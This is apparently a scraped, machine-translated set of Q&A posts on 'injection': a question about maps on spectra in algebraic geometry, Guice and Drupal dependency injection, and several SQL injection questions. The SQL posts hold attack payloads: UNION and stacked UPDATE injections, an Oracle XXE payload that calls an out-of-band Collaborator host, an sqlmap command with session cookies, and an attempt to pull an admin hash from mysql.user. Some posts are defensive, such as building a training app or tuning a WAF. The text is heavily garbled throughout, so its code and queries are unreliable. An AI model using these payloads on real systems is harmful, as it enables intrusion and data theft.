ag.algebraic geometry – injection map on spectra

I know that when we have a surprise $ f: B rightarrow A $This induces an injection into the spectra $ f ^ * Spec A hookrightarrow Spec B. $

What about the opposite? Does an injection of affine systems into the spectra lead to a surjection in rings?

I would assume that I would have found such a property somewhere online, if it is such a beautiful property. So can you give me a counterexample? There is also a natural set of conditions when $ f ^ * $ satisfy them, then we can close that $ f $ It is a surprise?

mysql – SQL Injection after Like Operator with continuous query

Is it possible to add a new query like the update in between?:

SELECT characters.id as charId
FROM signs
WO character.name
LIKE%% & # 39;
ORDER BY "level" DESC, exp DESC
LIMIT 10
OFFSET 0

I found out that union here is a vulnerability:
User input: & # 39; union select count (characters.id) FROM characters - & # 39;
Result:

SELECT characters.id
FROM signs
WO character.name
LIKE & # 39;% & # 39; Union selection number (characters.id) FROM characters - & # 39;% & # 39;
ORDER BY "level" DESC, exp DESC
LIMIT 10
OFFSET 0 

But my question now:
Is it somehow possible to add a completely new query?
I've already tried something like this:

& # 39 ;; UPDATE characters SET characters.name = & # 39; foo & # 39; - & # 39;

Which one is the following:

SELECT characters.id
FROM signs
WO character.name
LIKE & # 39;% & # 39 ;; UPDATE characters SET characters.name = & # 39; foo & # 39; - & # 39;% & # 39;
ORDER BY "level" DESC, exp DESC
LIMIT 10
OFFSET 0 

I get this error:

Check the manual that corresponds to your MySQL server version on the right
Syntax close to use
& # 39; update characters & # 39; Set character.name = & # 39; foo & # 39; -
"%"  n  nORDER BY "level" DESC, exp "on line 15",

I have the feeling that semicolons do not work in this case. If so, why should not they and is there an alternative / problem solving?

java – Guice – injection can not be created

I use guice for dependency injection, but in my specific use case, there is this error:

Classes must have either one (and only one) constructor annotated with @Inject, or a non-private null-argument constructor

I've spent a lot of time with it, but I still can not understand why it's unable to create dependency. Can anyone take a look?

My class structure is as follows:

Interface A {
}

Class B implements A

Class B implements A {

@Inject
B (String para1, MyClass B) {
// do something
}

}

Guice Module is as follows:

@AllArgsConstructor
public class GuiceModule extends AbstractModule {

@Run over
protected void configure () {

bind (A. class) .to (B. class);

}

@Bietet
public MyClass offerMyClass () {
return new MyClass ();
}


@Bietet
public String offerString () {
return "string";
}
}

In another class I do:

@Inject A a;

Dependency injection – D8: How Webprofiler EntityManagerWrapper overwrites the EntityTypeManager?

While trying to understand the new paradigm of Dependency Injection, I tried to install the Web Profiler in my D8.6.10 project, but it seemed like this would conflict with my already installed fullcalendar_view. It has a dependency that an instance of expected Drupal Core Entity EntityTypeManager This is important in this new world to explain what is required for your class / method.

When running through the stack trace, Drupal knows at some point that EntityTypeManager is required for full calendar dependency, but the call is co-opted by WebProfiler EntityManagerWrapper and it breaks the site.
I just managed to get past it by removing the EntityTypeManager request. My frustration is that I try to understand when to pull this stunt to remove a request for things like the Webprofiler and when I should not. I apologize that I do not have the resources to ask a focused question because I do not have enough knowledge about this new paradigm yet.

That's why I'm asking here.

Is it the Webprofiler that disregards the fullcalendar_view request and the EntityManagerWrapper or asks the fullcalendar_view for the wrong request?

sql injection – SQLmap Vulnerability Checker in SQL Burp

Burp suggests that an application has an SQL injection point.
First request:

GET /restrict/menuApc.do?MVPG=ApcAssistitoTSRicercaPre&ASSISTITO_ID=*SRVZOSA40004 "& s_ELIMINATI = 1 & s_TIPO_ASSISTITO = & s_ASSISTITO = giovanni & s_TIPO_SOFTExecutionWorking Group
Host: test-as01: 8080
Accept: */*
Accept-Language: DE
User-Agent: Mozilla / 5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident / 5.0)
Connection: close
Referer: http: // test-as01: 8080 / restrict / menuApc.do? MVPG = ApcAssistitiRicerca & s_ELIMINATI = 1 & s_TIPO_ASSISTITO = & s_ASSISTITO = giovanni & s_TIPO_SOGGETTO = 1
Cookie: JSESSIONID = 93A180A302C01AB1B387914B6EEF3639.test; JSESSIONIDSSO = D327785D2D903AAAD7E83CD2406BC3E8

First answer (only relevant part):

HTTP / 1.1 200 OK
Date: Mon, 04. March 2019 09:53:56 GMT
Cache control: private
Expires: Thu, Jan. 01, 1970, 01:00:00 CET
Content Type: Text / HTML; Character set = Windows-1252
Connection: close
Content length: 12467














Form: AssisitoTSRicerca
Error:
ORA-06502: PL / SQL: error: string buffer too small. Number or value

Dettaglio istruzione SQL:
ORA-06502: PL / SQL: error: string buffer too small. Number or value
ORA-06512: a "SA4WEB.SA4APC_CCS", line 2712

RawCommand sql = Select sa4apc_ccs.get_assistito_ricerca_ts (& # 39; {ASSISTITO_ID} & nb;; & nbsp;; & nbsp;; Utente} & nbsp;; & nbsp; & npr; 39; & nbsp; & nbsp; & nbsp; & nsp;; ricerca_ts from dual & # 39;
where = "zero"
order = & # 39; null & # 39;
countSql = SELECT COUNT (*) FROM (Choose sa4apc_ccs.get_assistito_ricerca_ts (& # 39; {ASSISTITO_ID} & # 39 ;, & # 39;; {utente} & # 39;, & # 39;; {MVURL} & # 39;) ricerca_ts of dual) cnt & # 39;
sqlString = selects sa4apc_ccs.get_assistito_ricerca_ts (# SRVZOSA40002294 # 39; CRDOPE # 39) & # 39; s & # 39; # / Sa4apc / restore / menuApc.do? ccsForm = AssistitiFiltro & # 39; 7% 7c% 7c (select% 20xtractvalue (x%) 3fxml% 20version% 3d% 221.0% 22% 20coding% 3d% 22UTF-8% 22% 3f% 3e% 3c! DOCTYPE% 20root% 20[%20%3c!ENTITY%20%25%20fvfvz%20SYSTEM%20%22http%3a%2f%2faq4lz51njd8q7f3n873myjtl4ca41s5gw3mrb.burpcollab''%7c%7c''orator.net%2f%22%3e%25fvfvz%3b]% 3e &%% 2c &% 2fl &% 20% 20dual)% 7c% 7c & # & MVPG = ApcAssistitiRicercaAvanzata & # 39; ricerca_ts from dual & # 39;
startPos = & # 39; 1 & # 39;
fetchSize = & # 39; 1 & # 39;
connection = & # 39; cn & # 39;
Parameter:
param1 paramName: ASSISTITO_ID: * SRVZOSA40002294 Type: java.lang.String
param2 paramName: MVURL: /sa4apc/restrict/menuApc.do?ccsForm=AssistitiFiltro'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding% 3d% 22UTF% 22% 3f% 3e% 3c! DOCTYPE% 20 root% 20[%20%3c!ENTITY%20%25%20fvfvz%20SYSTEM%20%22http%3a%2f%2faq4lz51njd8q7f3n873myjtl4ca41s5gw3mrb.burpcollab'%7c%7c'orator.net%2f%22%3e%25fvfvz%3b]% 3e)% 2c%% 2fl)% 20from% 20dual)% 7c% 7c & # 39; & MVPG = ApcAssistitiRicercaAvanzata type: java.lang.String
param3 paramName: Utente: CRDOPE type: java.lang.String

Second request:

GET /restrict/menuApc.do?MVPG=ApcAssistitoTSRicercaPre&ASSISTITO_ID=*SRVZOSA40002294 "" & s_ELIMINATI = 1 & s_TIPO_ASSISTITO = & s_ASSISTITO = giovanni & s_TO_OAOAO
Host: test-as01: 8080
Accept: */*
Accept-Language: DE
User-Agent: Mozilla / 5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident / 5.0)
Connection: close
Referer: http: // test-as01: 8080 / restrict / menuApc.do? MVPG = ApcAssistitiRicerca & s_ELIMINATI = 1 & s_TIPO_ASSISTITO = & s_ASSISTITO = giovanni & s_TIPO_SOGGETTO = 1
Cookie: JSESSIONID = 93A180A302C01AB1B387914B6EEF3639.test; JSESSIONIDSSO = D327785D2D903AAAD7E83CD2406BC3E8

Second answer (normal, no ORACLE error).

This is Burp message:

The parameter ASSISTITO_ID seems to be vulnerable to SQL injection
Attacks. A simple quote was sent in the ASSISTITO_ID parameter.
and a database error message was returned. Two single quotes were then
sent and the error disappears. You should check that
Contents of the error message and the treatment of other applications by the application
Enter to confirm if there is a vulnerability. Database
Seems to be Oracle.

This is the sqlmap command I'm using:

    Python sqlmap.py -u "http: // test-AS01: 8080 / sa4apc / restrict / menuApc.do MVPG = apcAssistitiRicerca & ASSISTITO_ID = SRVZOSA40002294 & s_ELIMINATI = 1 & s_TIPO_ASSISTITO = & s_ASSISTITO = giovanni & s_TIPO_SOGGETTO = 1" --cookie = "JSESSIONID = 93A180A302C01AB1B387914B6EEF3639.test; JSESSIONIDSSO = D327785D2D903AAAD7E83CD2406BC3E8" - Level 5 - Risk 3 - Threads = 3 -v 2 -p ASSISTITO_ID

(Note the absence of * and & # 39; in ASSISTITO_ID)
SQLmap can not find an SQL injection point.

Am I doing something wrong or is this a Burp-False-Positive?
SqlMap-part edition

part edition

8 – Call user :: load with dependency injection

I have code that worked, but I wanted to clean it up and use dependency injection. I'm working in a blockbase that implements ContainerFactoryPluginInterface.

Class DefaultBlock extended BlockBase implemented ContainerFactoryPluginInterface {

I need to access some information from the user object. At the moment I am using Drupal Core Session AccountProxyInterface. This works fine, but does not give me all the information I expected. I have a contrib module that adds a field to the user. I can access this field if I use User :: load ($ id). However, I get the warning that …

Calls to User :: load should be avoided in Drupal classes, use the dependency
instead of injection

So I try it. And fail.

This code works …

$ userIdx =  Drupal :: currentUser () -> id ();
$ userx =  Drupal  user  Entity  User :: load ($ userIdx);
$ countryx = $ userx-> country_iso_code_2;

But if I clean it up and do it right, I can not get the information about country_iso_code_2.

Here is the code I am trying to work with …

Account = $ account;
}

/ **
* {@inheritdoc}
* /
Public static function create (ContainerInterface $ container, Array $ configuration, $ plugin_id, $ plugin_definition) {
Return a new static (
$ Configuration,
$ plugin_id,
$ plugin_definition,
$ container-> get (& # 39; current_user & # 39;)
);
}

/ **
* {@inheritdoc}
* /
public function build () {
$ build = [];

$ userIdx =  Drupal :: currentUser () -> id ();
$ userx =  Drupal  user  Entity  User :: load ($ userIdx);
$ countryx = $ userx-> country_iso_code_2;

$ userId = $ this-> account-> id ();
$ country = $ this-> account-> country_iso_code_2;
.....

When debugging, I see the following:

$ userx is Drupal user Entity User

$ user is Drupal core Session AccountProxy

I understand that I work with two different things. I just do not understand how to call something like user :: load with dependency injection.

I hope that makes sense. Would like to have some advice!

SQL Injection in MariaDB – Information Security Stack Exchange

I'm trying to exploit a MariaDb database with an SQLi vulnerability (legal).

I identified the vulnerability here …

/ o = 1 & page = App

The o = * is vulnerable and generates the following error …

DEBUG INFO: You have an error in your SQL syntax. Check the manual that corresponds to your MariaDB server version for the correct syntax that is close to & # 39; 5 & # 39; or at least as & # 39; 1 & # 39; should be used. LIMIT 10 & # 39; in line 1

I'm using Burp Suite and ended up with the following syntax, which seems closer to the brand but still produces a syntax error.

I think it's closer to the brand because the bug spits out only the query I've introduced and not the & # 39; extra & # 39; field: & # 39; # 5 & 39; or at least as & # 39; 1 & # 39;) LIMIT 10 & # 39;,

I assume that this is part of the original query 1 is included, and if I test with other random strings, that remains true

I'm following the admin password hash I know from the page hints 1,

What's wrong with this query?

SELECT Password FROM mysql.user WHERE (uid = # 1 oder or at least as #% #) - & # 39;) LIMIT 10

Vulnerable Web Application – SQL injection that is hard to find with a regular scanner like SQL Map

I am creating a "vulnerable web application".

Is there a way to create an SQL injection vulnerability that is easy to spot in manual testing, but very difficult (or impossible) when a normal SQL scanner such as SQL Map or Burp Active Scan is detected?

This is important to me because I want to find out which testers can detect the scanner without the scanner.

One possibility that immediately came to my mind would be if the user had only one way to submit the form, but that would be too impractical.
I could use one-time tokens (csrf), but it's relatively easy to tell a scanner to get a new one before each request.

SQL Injection – WAF optimization for SQLi

Behind WAF is an application for recording data. Each time end users select a record with special characters like & # 39; or & # 39; or () submit, this will be blocked as SQLi, even if the payload is completely harmless.

At the moment we have set signs to let the traffic flow through.
I asked for an alert-only rule to maintain visibility over white traffic. However, this requires a lot of manual monitoring and I am not familiar with this approach in the long run. Any ideas on how to optimize rules without such an influence of SQLi detection?